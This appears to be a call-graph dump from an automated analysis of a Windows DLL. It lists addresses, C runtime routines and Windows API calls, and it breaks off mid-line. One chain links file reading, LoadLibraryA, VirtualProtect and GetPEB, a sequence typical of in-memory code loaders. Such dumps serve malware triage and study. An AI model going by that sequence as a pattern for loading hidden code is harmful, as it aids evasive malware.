18274 6c929fb8 __encode_pointer 6 API calls 18273->18274 18275 6c92a031 18274->18275 18275->18238 18275->18239 18277 6c929fd0 18276->18277 18278 6c929ff1 GetModuleHandleW 18276->18278 18277->18278 18281 6c929fda TlsGetValue 18277->18281 18279 6c92a001 18278->18279 18280 6c92a00c GetProcAddress 18278->18280 18282 6c925bcf __crt_waiting_on_module_handle 2 API calls 18279->18282 18283 6c929fe9 GetProcAddress 18280->18283 18285 6c929fe5 18281->18285 18284 6c92a007 18282->18284 18283->18251 18284->18280 18284->18283 18285->18278 18285->18283 18287 6c925c4c ExitProcess 18286->18287 18288 6c925c3c GetProcAddress 18286->18288 18288->18287 18290 6c92a929 18289->18290 18291 6c92a93c RtlEnterCriticalSection 18289->18291 18305 6c92a851 18290->18305 18291->18168 18293 6c92a92f 18293->18291 18331 6c925bff 18293->18331 18299 6c92b154 18296->18299 18297 6c92b1ed 18300 6c9249dc 18297->18300 18387 6c92ad3d 18297->18387 18299->18297 18299->18300 18380 6c92ac8d 18299->18380 18302 6c9249f5 18300->18302 18391 6c92a83a RtlLeaveCriticalSection 18302->18391 18304 6c9249fc 18304->18166 18306 6c92a85d __mtinitlocknum 18305->18306 18307 6c92a883 18306->18307 18308 6c92c046 __FF_MSGBANNER 67 API calls 18306->18308 18315 6c92a893 __mtinitlocknum 18307->18315 18338 6c92a5c3 18307->18338 18310 6c92a872 18308->18310 18312 6c92be9b __NMSG_WRITE 67 API calls 18310->18312 18311 6c92a89e 18313 6c92a8b4 18311->18313 18314 6c92a8a5 18311->18314 18316 6c92a879 18312->18316 18318 6c92a914 __lock 67 API calls 18313->18318 18317 6c925348 __strnicoll_l 67 API calls 18314->18317 18315->18293 18319 6c925c53 _malloc 3 API calls 18316->18319 18317->18315 18320 6c92a8bb 18318->18320 18319->18307 18321 6c92a8c3 18320->18321 18322 6c92a8ef 18320->18322 18343 6c92e1d3 18321->18343 18323 6c924618 __mtinitlocknum 67 API calls 18322->18323 18325 6c92a8e0 18323->18325 18360 6c92a90b 18325->18360 18326 6c92a8ce 18326->18325 18347 6c924618 18326->18347 18329 6c92a8da 18330 6c925348 __strnicoll_l 67 API calls 18329->18330 18330->18325 18332 6c92c046 __FF_MSGBANNER 67 API calls 18331->18332 18333 6c925c09 18332->18333 18334 6c92be9b __NMSG_WRITE 67 API calls 18333->18334 18335 6c925c11 18334->18335 18336 6c92a033 __decode_pointer 6 API calls 18335->18336 18337 6c925c1c 18336->18337 18337->18291 18341 6c92a5cc 18338->18341 18339 6c9249fe _malloc 66 API calls 18339->18341 18340 6c92a602 18340->18311 18341->18339 18341->18340 18342 6c92a5e3 Sleep 18341->18342 18342->18341 18363 6c9253bc 18343->18363 18345 6c92e1df InitializeCriticalSectionAndSpinCount 18346 6c92e223 __mtinitlocknum 18345->18346 18346->18326 18349 6c924624 __mtinitlocknum 18347->18349 18348 6c92469d __expand __mtinitlocknum 18348->18329 18349->18348 18351 6c92a914 __lock 65 API calls 18349->18351 18359 6c924663 18349->18359 18350 6c924678 HeapFree 18350->18348 18352 6c92468a 18350->18352 18356 6c92463b ___sbh_find_block 18351->18356 18353 6c925348 __strnicoll_l 65 API calls 18352->18353 18354 6c92468f GetLastError 18353->18354 18354->18348 18355 6c924655 18371 6c92466e 18355->18371 18356->18355 18364 6c92a977 18356->18364 18359->18348 18359->18350 18379 6c92a83a RtlLeaveCriticalSection 18360->18379 18362 6c92a912 18362->18315 18363->18345 18365 6c92ac58 18364->18365 18366 6c92a9b6 18364->18366 18365->18355 18366->18365 18367 6c92aba2 VirtualFree 18366->18367 18368 6c92ac06 18367->18368 18368->18365 18369 6c92ac15 VirtualFree HeapFree 18368->18369 18374 6c928190 18369->18374 18378 6c92a83a RtlLeaveCriticalSection 18371->18378 18373 6c924675 18373->18359 18375 6c9281a8 18374->18375 18376 6c9281cf __VEC_memcpy 18375->18376 18377 6c9281d7 18375->18377 18376->18377 18377->18365 18378->18373 18379->18362 18381 6c92aca0 RtlReAllocateHeap 18380->18381 18382 6c92acd4 RtlAllocateHeap 18380->18382 18384 6c92acc2 18381->18384 18386 6c92acbe 18381->18386 18383 6c92acf7 VirtualAlloc 18382->18383 18382->18386 18385 6c92ad11 HeapFree 18383->18385 18383->18386 18384->18382 18385->18386 18386->18297 18388 6c92ad54 VirtualAlloc 18387->18388 18390 6c92ad9b 18388->18390 18390->18300 18391->18304 18406 6c92a0ae TlsGetValue 18392->18406 18394 6c92a273 SetLastError 18394->18177 18398 6c92a033 __decode_pointer 6 API calls 18399 6c92a24b 18398->18399 18400 6c92a252 18399->18400 18401 6c92a26a 18399->18401 18417 6c92a11f 18400->18417 18402 6c924618 __mtinitlocknum 64 API calls 18401->18402 18404 6c92a270 18402->18404 18404->18394 18405 6c92a25a GetCurrentThreadId 18405->18394 18407 6c92a0c3 18406->18407 18408 6c92a0de 18406->18408 18409 6c92a033 __decode_pointer 6 API calls 18407->18409 18408->18394 18411 6c92a608 18408->18411 18410 6c92a0ce TlsSetValue 18409->18410 18410->18408 18413 6c92a611 18411->18413 18414 6c92a231 18413->18414 18415 6c92a62f Sleep 18413->18415 18435 6c92b40b 18413->18435 18414->18394 18414->18398 18416 6c92a644 18415->18416 18416->18413 18416->18414 18452 6c9253bc 18417->18452 18419 6c92a12b GetModuleHandleW 18420 6c92a141 18419->18420 18421 6c92a13b 18419->18421 18422 6c92a159 GetProcAddress GetProcAddress 18420->18422 18423 6c92a17d 18420->18423 18424 6c925bcf __crt_waiting_on_module_handle 2 API calls 18421->18424 18422->18423 18425 6c92a914 __lock 63 API calls 18423->18425 18424->18420 18426 6c92a19c InterlockedIncrement 18425->18426 18453 6c92a1f4 18426->18453 18429 6c92a914 __lock 63 API calls 18430 6c92a1bd 18429->18430 18456 6c930414 InterlockedIncrement 18430->18456 18432 6c92a1db 18468 6c92a1fd 18432->18468 18434 6c92a1e8 __mtinitlocknum 18434->18405 18436 6c92b417 __mtinitlocknum 18435->18436 18437 6c92b42f 18436->18437 18447 6c92b44e _memset 18436->18447 18438 6c925348 __strnicoll_l 66 API calls 18437->18438 18439 6c92b434 18438->18439 18440 6c92815c __strnicoll_l 6 API calls 18439->18440 18444 6c92b444 __mtinitlocknum 18440->18444 18441 6c92b4c0 RtlAllocateHeap 18441->18447 18442 6c92c08e _malloc 6 API calls 18442->18447 18443 6c92a914 __lock 66 API calls 18443->18447 18444->18413 18445 6c92b126 ___sbh_alloc_block 5 API calls 18445->18447 18447->18441 18447->18442 18447->18443 18447->18444 18447->18445 18448 6c92b507 18447->18448 18451 6c92a83a RtlLeaveCriticalSection 18448->18451 18450 6c92b50e 18450->18447 18451->18450 18452->18419 18471 6c92a83a RtlLeaveCriticalSection 18453->18471 18455 6c92a1b6 18455->18429 18457 6c930432 InterlockedIncrement 18456->18457 18458 6c930435 18456->18458 18457->18458 18459 6c930442 18458->18459 18460 6c93043f InterlockedIncrement 18458->18460 18461 6c93044f 18459->18461 18462 6c93044c InterlockedIncrement 18459->18462 18460->18459 18463 6c930459 InterlockedIncrement 18461->18463 18465 6c93045c 18461->18465 18462->18461 18463->18465 18464 6c930475 InterlockedIncrement 18464->18465 18465->18464 18466 6c930485 InterlockedIncrement 18465->18466 18467 6c930490 InterlockedIncrement 18465->18467 18466->18465 18467->18432 18472 6c92a83a RtlLeaveCriticalSection 18468->18472 18470 6c92a204 18470->18434 18471->18455 18472->18470 18474 6c9114b6 18473->18474 18475 6c9114ac ctype 18473->18475 18476 6c9114ed 18474->18476 18483 6c9113f0 18474->18483 18475->17967 18478 6c91150a 18476->18478 18479 6c9114fd 18476->18479 18500 6c923f43 18478->18500 18488 6c923fc0 18479->18488 18482 6c911508 18482->17967 18484 6c911330 18483->18484 18485 6c9113b0 18484->18485 18486 6c923f43 _memcpy_s 67 API calls 18484->18486 18485->18476 18487 6c91137d 18486->18487 18487->18476 18489 6c923fd0 18488->18489 18499 6c923fe9 18488->18499 18490 6c923fd5 18489->18490 18492 6c923ff5 18489->18492 18491 6c925348 __strnicoll_l 67 API calls 18490->18491 18493 6c923fda 18491->18493 18494 6c923ffa 18492->18494 18495 6c924008 18492->18495 18498 6c92815c __strnicoll_l 6 API calls 18493->18498 18497 6c925348 __strnicoll_l 67 API calls 18494->18497 18496 6c928190 __fptostr __VEC_memcpy 18495->18496 18496->18499 18497->18493 18498->18499 18499->18482 18504 6c923f53 ___crtGetEnvironmentStringsA 18500->18504 18505 6c923f57 _memset 18500->18505 18501 6c923f5c 18502 6c925348 __strnicoll_l 67 API calls 18501->18502 18503 6c923f61 18502->18503 18506 6c92815c __strnicoll_l 6 API calls 18503->18506 18504->18482 18505->18501 18505->18504 18507 6c923fa6 18505->18507 18506->18504 18507->18504 18508 6c925348 __strnicoll_l 67 API calls 18507->18508 18508->18503 18514 6c923d7f 18509->18514 18510 6c916dc1 ctype 2 API calls 18510->18514 18511 6c923dad 18512 6c9168e2 ctype 67 API calls 18511->18512 18513 6c923d92 _memset ctype 18512->18513 18513->17989 18514->18510 18514->18511 18514->18513 18515 6c923e3c 18514->18515 18516 6c9168e2 ctype 67 API calls 18515->18516 18517 6c923e45 18516->18517 18561 6c915ac0 18517->18561 18520 6c915cd6 18519->18520 18564 6c91afc3 18520->18564 18522 6c915d57 18523 6c91afc3 69 API calls 18522->18523 18524 6c915d61 18523->18524 18574 6c9164e0 18524->18574 18527 6c915eba GlobalAlloc 18528 6c915d97 18527->18528 18528->18527 18529 6c9167c3 18528->18529 18530 6c9160f0 CreateFileW 18528->18530 18530->18528 18531 6c9161de 18530->18531 18535 6c915de6 18532->18535 18533 6c915eba GlobalAlloc 18533->18535 18534 6c9161d2 18535->18533 18535->18534 18536 6c9160f0 CreateFileW 18535->18536 18536->18534 18536->18535 18538 6c91b201 18537->18538 18539 6c91b1fc 18537->18539 18541 6c91b211 18538->18541 18542 6c923d6c 69 API calls 18538->18542 18540 6c916dc1 ctype 2 API calls 18539->18540 18540->18538 18541->17989 18542->18541 18543->18543 18547 6c915de6 18543->18547 18544 6c9167c3 18545 6c915eba GlobalAlloc 18545->18547 18546 6c9160f0 CreateFileW 18546->18547 18548 6c9161de 18546->18548 18547->18544 18547->18545 18547->18546 18552 6c916250 18549->18552 18550 6c9162f3 ReadFile 18551 6c9161f0 18550->18551 18550->18552 18551->17993 18552->18550 18552->18552 18553 6c9166d2 18552->18553 18560 6c9163fe 18554->18560 18555 6c9165f3 LoadLibraryA VirtualProtect 18557 6c9167f8 18555->18557 18556 6c9166f0 18558 6c916649 VirtualProtect 18557->18558 18559 6c916663 18558->18559 18559->17989 18560->18555 18560->18556 18562 6c923f43 _memcpy_s 67 API calls 18561->18562 18563 6c915ad9 18562->18563 18563->18513 18567 6c91afd6 18564->18567 18565 6c916dc1 ctype 2 API calls 18565->18567 18566 6c91b009 18568 6c9168e2 ctype 67 API calls 18566->18568 18567->18565 18567->18566 18569 6c91b08c 18567->18569 18573 6c91afe9 _memset ctype 18567->18573 18568->18573 18570 6c9168e2 ctype 67 API calls 18569->18570 18571 6c91b094 18570->18571 18572 6c915ac0 67 API calls 18571->18572 18572->18573 18573->18522 18578 6c9164ea LoadLibraryA VirtualProtect 18574->18578 18580 6c9167f8 18578->18580 18579 6c915d67 GetPEB 18579->18528 18581 6c916649 VirtualProtect 18580->18581 18581->18579 18584 6c917696 ctype 18582->18584 18583 6c917807 18585 6c9177fb 18583->18585 18646 6c912330 18583->18646 18584->18583 18588 6c9176bd 18584->18588 18587 6c923f34 __cftof_l 5 API calls 18585->18587 18589 6c917835 18587->18589 18603 6c91748e 18588->18603 18589->17996 18680 6c911440 18597->18680 18599 6c917312 _memset 18600 6c916a35 67 API calls 18599->18600 18601 6c917329 PathStripToRootW 18600->18601 18602 6c91733d 18601->18602 18602->17998 18604 6c91749d __EH_prolog3_GS 18603->18604 18605 6c916dc1 ctype 2 API calls 18604->18605 18606 6c9174c7 GetFullPathNameW 18604->18606 18605->18604 18607 6c9174e0 18606->18607 18608 6c917505 18606->18608 18653 6c916a35 18607->18653 18609 6c917524 18608->18609 18610 6c917509 18608->18610 18615 6c9172fd 68 API calls 18609->18615 18613 6c912330 67 API calls 18610->18613 18633 6c9174fe ctype 18610->18633 18612 6c9174ef 18614 6c91745f 68 API calls 18612->18614 18613->18633 18614->18633 18617 6c917540 PathIsUNCW 18615->18617 18619 6c917554 GetVolumeInformationW 18617->18619 18617->18633 18620 6c917577 18619->18620 18621 6c917596 18619->18621 18624 6c91745f 68 API calls 18620->18624 18622 6c9175a6 18621->18622 18623 6c91759f CharUpperW 18621->18623 18625 6c9175af FindFirstFileW 18622->18625 18622->18633 18623->18622 18624->18633 18626 6c9175c7 FindClose 18625->18626 18625->18633 18626->18620 18627 6c9175d7 18626->18627 18627->18620 18628 6c9175df lstrlenW 18627->18628 18629 6c91762d 18628->18629 18630 6c9175fc 18628->18630 18632 6c912330 67 API calls 18629->18632 18629->18633 18656 6c916ea0 18630->18656 18632->18633 18659 6c9251b5 18633->18659 18647 6c91233b 18646->18647 18648 6c91234a 18646->18648 18649 6c9114a0 67 API calls 18647->18649 18651 6c9114a0 67 API calls 18648->18651 18650 6c912344 18649->18650 18650->18585 18652 6c912369 18651->18652 18652->18585 18662 6c9244cb 18653->18662 18655 6c916a4b 18655->18612 18671 6c9251ed 18656->18671 18658 6c916eb3 18658->18633 18660 6c923f34 __cftof_l 5 API calls 18659->18660 18661 6c9251bf 18660->18661 18661->18661 18667 6c9244dd 18662->18667 18663 6c9244e1 18664 6c925348 __strnicoll_l 67 API calls 18663->18664 18665 6c9244e6 18663->18665 18666 6c9244fd 18664->18666 18665->18655 18668 6c92815c __strnicoll_l 6 API calls 18666->18668 18667->18663 18667->18665 18669 6c92452d 18667->18669 18668->18665 18669->18665 18670 6c925348 __strnicoll_l 67 API calls 18669->18670 18670->18666 18672 6c925205 18671->18672 18673 6c9251fe 18671->18673 18674 6c925348 __strnicoll_l 67 API calls 18672->18674 18673->18672 18678 6c925231 18673->18678 18675 6c92520a 18674->18675 18676 6c92815c __strnicoll_l 6 API calls 18675->18676 18677 6c925219 18676->18677 18677->18658 18678->18677 18679 6c925348 __strnicoll_l 67 API calls 18678->18679 18679->18675 18681 6c911465 18680->18681 18682 6c91145d 18680->18682 18681->18599 18683 6c9113f0 67 API calls 18682->18683 18683->18681 18685 6c9148be 18684->18685 18686 6c9162d0 ReadFile 18685->18686 18687 6c91492c 18686->18687 18688 6c9115f0 67 API calls 18687->18688 18689 6c91493e 18688->18689 18746 6c9130e0 18689->18746 18691 6c91496f 18692 6c914a3d 18691->18692 18749 6c913150 18691->18749 18695 6c923f34 __cftof_l 5 API calls 18692->18695 18698 6c914aae 18695->18698 18696 6c9115f0 67 API calls 18697 6c914996 18696->18697 18753 6c915670 18697->18753 18698->18003 18700 6c9149d6 18701 6c91afc3 69 API calls 18700->18701 18702 6c9149f9 ___crtGetEnvironmentStringsA 18701->18702 18702->18692 18703 6c924618 __mtinitlocknum 67 API calls 18702->18703 18703->18692 18705 6c914b00 18704->18705 18865 6c913720 18705->18865 18728 6c9166d2 18727->18728 18731 6c91626d 18727->18731 18729 6c9162f3 ReadFile 18730 6c9161f0 18729->18730 18729->18731 18730->18003 18731->18728 18731->18729 18733 6c9154f7 18732->18733 18737 6c9154be 18732->18737 18734 6c9131f0 102 API calls 18733->18734 18733->18737 18735 6c91551a 18734->18735 18736 6c912600 101 API calls 18735->18736 18736->18737 18737->18003 18739 6c914616 18738->18739 18740 6c923f34 __cftof_l 5 API calls 18739->18740 18741 6c9146ee 18740->18741 18741->18002 18743 6c9147f9 18742->18743 18744 6c923f34 __cftof_l 5 API calls 18743->18744 18745 6c914873 18744->18745 18745->18021 18765 6c912b50 18746->18765 18748 6c9130f2 _wcspbrk 18748->18691 18750 6c91318b 18749->18750 18751 6c912600 101 API calls 18750->18751 18752 6c9131d7 18751->18752 18752->18696 18754 6c915681 lstrlenW 18753->18754 18755 6c91567b 18753->18755 18780 6c915730 18754->18780 18755->18700 18758 6c9156c5 GetLastError 18760 6c9156d0 WideCharToMultiByte 18758->18760 18761 6c915716 18758->18761 18759 6c91571f 18759->18700 18762 6c915730 73 API calls 18760->18762 18761->18759 18788 6c915b00 GetLastError 18761->18788 18763 6c9156f4 WideCharToMultiByte 18762->18763 18763->18761 18766 6c912b7e 18765->18766 18767 6c912bd1 18766->18767 18768 6c912bb9 18766->18768 18770 6c9114a0 67 API calls 18767->18770 18772 6c91a58c 18768->18772 18771 6c912bc2 18770->18771 18771->18748 18775 6c91aef1 18772->18775 18776 6c91c050 ctype 25 API calls 18775->18776 18777 6c91af00 18776->18777 18778 6c91a591 18777->18778 18779 6c91bb0c ctype 8 API calls 18777->18779 18778->18771 18779->18777 18781 6c915734 18780->18781 18782 6c915771 18781->18782 18783 6c915788 18781->18783 18790 6c9246a6 18781->18790 18782->18783 18785 6c924618 __mtinitlocknum 67 API calls 18782->18785 18787 6c91569f WideCharToMultiByte 18783->18787 18801 6c924721 18783->18801 18785->18783 18787->18758 18787->18759 18789 6c915b0a 18788->18789 18791 6c9246b5 18790->18791 18792 6c9246dd 18790->18792 18791->18792 18794 6c9246c1 18791->18794 18793 6c9246f2 18792->18793 18808 6c927637 18792->18808 18821 6c924ac8 18793->18821 18797 6c925348 __strnicoll_l 67 API calls 18794->18797 18798 6c9246c6 18797->18798 18799 6c92815c __strnicoll_l 6 API calls 18798->18799 18800 6c9246d6 _memset 18799->18800 18800->18782 18802 6c92b40b __calloc_impl 67 API calls 18801->18802 18803 6c92473b 18802->18803 18804 6c924757 18803->18804 18805 6c925348 __strnicoll_l 67 API calls 18803->18805 18804->18783 18806 6c92474e 18805->18806 18806->18804 18807 6c925348 __strnicoll_l 67 API calls 18806->18807 18807->18804 18809 6c927643 __mtinitlocknum 18808->18809 18810 6c927653 18809->18810 18811 6c927670 18809->18811 18812 6c925348 __strnicoll_l 67 API calls 18810->18812 18813 6c9276b1 RtlSizeHeap 18811->18813 18815 6c92a914 __lock 67 API calls 18811->18815 18817 6c927680 ___sbh_find_block 18811->18817 18814 6c927658 18812->18814 18818 6c927668 __mtinitlocknum 18813->18818 18816 6c92815c __strnicoll_l 6 API calls 18814->18816 18815->18817 18816->18818 18857 6c9276d1 18817->18857 18818->18793 18822 6c924ad4 __mtinitlocknum 18821->18822 18823 6c924adb 18822->18823 18824 6c924ae9 18822->18824 18825 6c9249fe _malloc 67 API calls 18823->18825 18826 6c924af0 18824->18826 18827 6c924afc 18824->18827 18829 6c924ae3 __expand __mtinitlocknum 18825->18829 18828 6c924618 __mtinitlocknum 67 API calls 18826->18828 18831 6c924b09 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 18827->18831 18836 6c924c6e 18827->18836 18828->18829 18829->18800 18830 6c924ca1 18832 6c92c08e _malloc 6 API calls 18830->18832 18831->18829 18831->18830 18833 6c92a914 __lock 67 API calls 18831->18833 18845 6c924b94 RtlAllocateHeap 18831->18845 18848 6c924be9 RtlReAllocateHeap 18831->18848 18849 6c92b126 ___sbh_alloc_block 5 API calls 18831->18849 18850 6c924c54 18831->18850 18851 6c92c08e _malloc 6 API calls 18831->18851 18853 6c924c37 18831->18853 18856 6c92a977 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 18831->18856 18861 6c924c0c 18831->18861 18835 6c924ca7 18832->18835 18833->18831 18834 6c924c73 RtlReAllocateHeap 18834->18829 18834->18836 18838 6c925348 __strnicoll_l 67 API calls 18835->18838 18836->18830 18836->18834 18837 6c924cc5 18836->18837 18839 6c92c08e _malloc 6 API calls 18836->18839 18841 6c924cbb 18836->18841 18837->18829 18840 6c925348 __strnicoll_l 67 API calls 18837->18840 18838->18829 18839->18836 18842 6c924cce GetLastError 18840->18842 18844 6c925348 __strnicoll_l 67 API calls 18841->18844 18842->18829 18846 6c924c3c 18844->18846 18845->18831 18846->18829 18847 6c924c41 GetLastError 18846->18847 18847->18829 18848->18831 18849->18831 18850->18829 18852 6c925348 __strnicoll_l 67 API calls 18850->18852 18851->18831 18854 6c924c61 18852->18854 18855 6c925348 __strnicoll_l 67 API calls 18853->18855 18854->18829 18854->18842 18855->18846 18856->18831 18860 6c92a83a RtlLeaveCriticalSection 18857->18860 18859 6c9276ac 18859->18813 18859->18818 18860->18859 18864 6c92a83a RtlLeaveCriticalSection 18861->18864 18863 6c924c13 18863->18831 18864->18863 18866 6c913756 18865->18866 18867 6c91afc3 69 API calls 18866->18867 18868 6c913769 18867->18868 18869 6c9160f0 CreateFileW 18868->18869 18871 6c9161de 18869->18871 18872 6c915de6 18869->18872 18870 6c915eba GlobalAlloc 18870->18872 18872->18869 18872->18870 18873 6c9167c3 18872->18873 18875 6c911580 67 API calls 18874->18875 18876 6c912f92 18875->18876 18877 6c9113f0 67 API calls 18876->18877 18878 6c912fc2 __wcsrev 18876->18878 18877->18878 18879 6c912f60 67 API calls 18878->18879 18881 6c912fe0 _wcspbrk 18878->18881 18880 6c91309f 18879->18880 18882 6c9130a7 18880->18882 18883 6c9130bc 18880->18883 18881->18032 18884 6c913370 67 API calls 18882->18884 18885 6c911580 67 API calls 18883->18885 18887 6c9130b8 18884->18887 18886 6c9130c7 18885->18886 18886->18032 18887->18032 18889 6c913386 18888->18889 18890 6c913391 18889->18890 18893 6c9133af 18889->18893 18891 6c911580 67 API calls 18890->18891 18892 6c91339a 18891->18892 18892->18038 18901 6c913680 18893->18901 18897 6c91158f 18896->18897 18898 6c91159c 18897->18898 18899 6c923f43 _memcpy_s 67 API calls 18897->18899 18898->18037 18900 6c9115e1 18899->18900 18900->18037 18902 6c91368b 18901->18902 18903 6c923f43 _memcpy_s 67 API calls 18902->18903 18904 6c9133e6 18903->18904 18904->18038 18906 6c91341f 18905->18906 18907 6c91340e 18905->18907 18906->18044 18914 6c9128d0 LoadResource 18907->18914 18909 6c913416 18909->18906 18910 6c913447 18909->18910 18911 6c9113f0 67 API calls 18909->18911 18912 6c923f43 _memcpy_s 67 API calls 18910->18912 18911->18910 18913 6c91347e 18912->18913 18913->18044 18915 6c9128e6 18914->18915 18916 6c9128e9 LockResource 18914->18916 18915->18909 18917 6c91290a 18916->18917 18918 6c9128f7 SizeofResource 18916->18918 18917->18909 18918->18917 18920 6c91124c 18919->18920 18927 6c924320 18920->18927 18923 6c911286 18930 6c9241a0 18923->18930 18924 6c9113f0 67 API calls 18924->18923 18926 6c911294 18926->18061 18933 6c9242c9 18927->18933 18939 6c924115 18930->18939 18934 6c9242d9 18933->18934 18938 6c911263 18933->18938 18935 6c925348 __strnicoll_l 67 API calls 18934->18935 18936 6c9242de 18935->18936 18937 6c92815c __strnicoll_l 6 API calls 18936->18937 18937->18938 18938->18923 18938->18924 18940 6c924122 18939->18940 18941 6c92413f 18939->18941 18942 6c925348 __strnicoll_l 67 API calls 18940->18942 18943 6c92414c 18941->18943 18945 6c924159 18941->18945 18944 6c924127 18942->18944 18946 6c925348 __strnicoll_l 67 API calls 18943->18946 18948 6c92815c __strnicoll_l 6 API calls 18944->18948 18954 6c92401d 18945->18954 18949 6c924151 18946->18949 18952 6c924137 18948->18952 18951 6c92815c __strnicoll_l 6 API calls 18949->18951 18951->18952 18952->18926 18953 6c925348 __strnicoll_l 67 API calls 18953->18949 18955 6c92404d 18954->18955 18956 6c92402d 18954->18956 18959 6c92405d 18955->18959 18965 6c92407d 18955->18965 18957 6c925348 __strnicoll_l 67 API calls 18956->18957 18958 6c924032 18957->18958 18960 6c92815c __strnicoll_l 6 API calls 18958->18960 18961 6c925348 __strnicoll_l 67 API calls 18959->18961 18967 6c924042 18960->18967 18962 6c924062 18961->18962 18963 6c92815c __strnicoll_l 6 API calls 18962->18963 18963->18967 18964 6c9240c4 18964->18967 18968 6c9284f5 __flsbuf 101 API calls 18964->18968 18965->18964 18965->18967 18969 6c9284f5 18965->18969 18967->18952 18967->18953 18968->18967 18990 6c92fbb6 18969->18990 18972 6c928510 18976 6c925348 __strnicoll_l 67 API calls 18972->18976 18973 6c928527 18974 6c92852b 18973->18974 18975 6c928538 __flswbuf 18973->18975 18977 6c925348 __strnicoll_l 67 API calls 18974->18977 18978 6c928515 18975->18978 18986 6c92858e 18975->18986 18989 6c928599 18975->18989 18996 6c92f99d 18975->18996 18976->18978 18977->18978 18978->18964 18979 6c928628 18981 6c92f878 __locking 101 API calls 18979->18981 18980 6c9285a8 18982 6c9285bf 18980->18982 18985 6c9285dc 18980->18985 18981->18978 19008 6c92f878 18982->19008 18985->18978 19033 6c92f02c 18985->19033 18986->18989 19005 6c92f954 18986->19005 18989->18979 18989->18980 18991 6c92fbc5 18990->18991 18993 6c928505 18990->18993 18992 6c925348 __strnicoll_l 67 API calls 18991->18992 18994 6c92fbca 18992->18994 18993->18972 18993->18973 18995 6c92815c __strnicoll_l 6 API calls 18994->18995 18995->18993 18997 6c92f9aa 18996->18997 18998 6c92f9b9 18996->18998 18999 6c925348 __strnicoll_l 67 API calls 18997->18999 19001 6c92f9dd 18998->19001 19002 6c925348 __strnicoll_l 67 API calls 18998->19002 19000 6c92f9af 18999->19000 19000->18986 19001->18986 19003 6c92f9cd 19002->19003 19004 6c92815c __strnicoll_l 6 API calls 19003->19004 19004->19001 19006 6c92a5c3 __malloc_crt 67 API calls 19005->19006 19007 6c92f969 19006->19007 19007->18989 19009 6c92f884 __mtinitlocknum 19008->19009 19010 6c92f8a7 19009->19010 19011 6c92f88c 19009->19011 19012 6c92f8b5 19010->19012 19018 6c92f8f6 19010->19018 19065 6c92535b 19011->19065 19015 6c92535b __dosmaperr 67 API calls 19012->19015 19017 6c92f8ba 19015->19017 19016 6c925348 __strnicoll_l 67 API calls 19028 6c92f899 __mtinitlocknum 19016->19028 19019 6c925348 __strnicoll_l 67 API calls 19017->19019 19068 6c9319c1 19018->19068 19022 6c92f8c1 19019->19022 19021 6c92f8fc 19023 6c92f909 19021->19023 19024 6c92f91f 19021->19024 19025 6c92815c __strnicoll_l 6 API calls 19022->19025 19078 6c92f145 19023->19078 19027 6c925348 __strnicoll_l 67 API calls 19024->19027 19025->19028 19030 6c92f924 19027->19030 19028->18978 19029 6c92f917 19137 6c92f94a 19029->19137 19031 6c92535b __dosmaperr 67 API calls 19030->19031 19031->19029 19034 6c92f038 __mtinitlocknum 19033->19034 19035 6c92f065 19034->19035 19036 6c92f049 19034->19036 19037 6c92f073 19035->19037 19040 6c92f094 19035->19040 19038 6c92535b __dosmaperr 67 API calls 19036->19038 19041 6c92535b __dosmaperr 67 API calls 19037->19041 19039 6c92f04e 19038->19039 19042 6c925348 __strnicoll_l 67 API calls 19039->19042 19044 6c92f0b4 19040->19044 19045 6c92f0da 19040->19045 19043 6c92f078 19041->19043 19057 6c92f056 __mtinitlocknum 19042->19057 19047 6c925348 __strnicoll_l 67 API calls 19043->19047 19048 6c92535b __dosmaperr 67 API calls 19044->19048 19046 6c9319c1 ___lock_fhandle 68 API calls 19045->19046 19050 6c92f0e0 19046->19050 19051 6c92f07f 19047->19051 19049 6c92f0b9 19048->19049 19052 6c925348 __strnicoll_l 67 API calls 19049->19052 19053 6c92f109 19050->19053 19054 6c92f0ed 19050->19054 19055 6c92815c __strnicoll_l 6 API calls 19051->19055 19056 6c92f0c0 19052->19056 19059 6c925348 __strnicoll_l 67 API calls 19053->19059 19058 6c92efa7 __lseeki64_nolock 69 API calls 19054->19058 19055->19057 19060 6c92815c __strnicoll_l 6 API calls 19056->19060 19057->18978 19061 6c92f0fe 19058->19061 19062 6c92f10e 19059->19062 19060->19057 19184 6c92f13b 19061->19184 19063 6c92535b __dosmaperr 67 API calls 19062->19063 19063->19061 19066 6c92a206 __getptd_noexit 67 API calls 19065->19066 19067 6c925360 19066->19067 19067->19016 19069 6c9319cd __mtinitlocknum 19068->19069 19070 6c931a28 19069->19070 19072 6c92a914 __lock 67 API calls 19069->19072 19071 6c931a2d RtlEnterCriticalSection 19070->19071 19073 6c931a4a __mtinitlocknum 19070->19073 19071->19073 19074 6c9319f9 19072->19074 19073->19021 19075 6c931a10 19074->19075 19077 6c92e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19074->19077 19140 6c931a58 19075->19140 19077->19075 19079 6c92f154 __write_nolock 19078->19079 19080 6c92f186 19079->19080 19081 6c92f1ad 19079->19081 19109 6c92f17b 19079->19109 19082 6c92535b __dosmaperr 67 API calls 19080->19082 19085 6c92f215 19081->19085 19086 6c92f1ef 19081->19086 19084 6c92f18b 19082->19084 19083 6c923f34 __cftof_l 5 API calls 19087 6c92f876 19083->19087 19089 6c925348 __strnicoll_l 67 API calls 19084->19089 19088 6c92f229 19085->19088 19144 6c92efa7 19085->19144 19090 6c92535b __dosmaperr 67 API calls 19086->19090 19087->19029 19093 6c92f99d __flswbuf 67 API calls 19088->19093 19092 6c92f192 19089->19092 19094 6c92f1f4 19090->19094 19095 6c92815c __strnicoll_l 6 API calls 19092->19095 19096 6c92f234 19093->19096 19097 6c925348 __strnicoll_l 67 API calls 19094->19097 19095->19109 19098 6c92f4da 19096->19098 19154 6c92a27f 19096->19154 19099 6c92f1fd 19097->19099 19101 6c92f4ea 19098->19101 19102 6c92f7a9 WriteFile 19098->19102 19100 6c92815c __strnicoll_l 6 API calls 19099->19100 19100->19109 19105 6c92f5c8 19101->19105 19124 6c92f4fe 19101->19124 19104 6c92f7dc GetLastError 19102->19104 19130 6c92f4bc 19102->19130 19104->19130 19114 6c92f6a8 19105->19114 19126 6c92f5d7 19105->19126 19107 6c92f827 19107->19109 19111 6c925348 __strnicoll_l 67 API calls 19107->19111 19108 6c92f27a 19108->19098 19110 6c92f28c GetConsoleCP 19108->19110 19109->19083 19110->19130 19135 6c92f2af 19110->19135 19113 6c92f84a 19111->19113 19112 6c92f7fa 19116 6c92f805 19112->19116 19117 